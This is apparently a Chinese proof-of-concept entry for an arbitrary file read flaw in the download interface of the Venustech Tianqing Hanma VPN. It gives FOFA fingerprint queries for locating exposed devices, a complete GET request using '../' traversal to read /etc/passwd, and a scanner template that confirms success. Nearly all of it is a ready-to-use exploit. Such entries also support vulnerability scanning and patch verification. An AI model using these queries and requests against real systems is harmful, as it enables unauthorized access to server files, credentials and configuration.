启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞,获取服务器的敏感数据和配置信息,造成系统的不安全性,从而控制服务器。
icon_hash="-15980305"
app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Cookie: VSG_VERIFYCODE_CONF=0-0; VSG_CLIENT_RUNNING=false; VSG_LANGUAGE=zh_CN; VSG_CSRFTOKEN=1ec96cd6acc254fcf9e9cd6d1e85cf23
Host:
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
id: 启明星辰-天清汉马VPN接口download任意文件读取
info:
name: 启明星辰-天清汉马VPN接口download任意文件读取
author: wy876
severity: high
description: |
启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞,获取服务器的敏感数据和配置信息,造成系统的不安全性,从而控制服务器。
Fofa: icon_hash="-15980305"
app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
reference:
- https://github.com/wy876/POC/blob/main/启明星辰-天清汉马VPN接口download任意文件读取.md
rules:
r0:
request:
method: GET
path: /vpn/user/download/client?ostype=../../../../../../../etc/passwd
expression: response.status == 200 && response.body.bcontains(b'root:x:0:0')
expression: r0()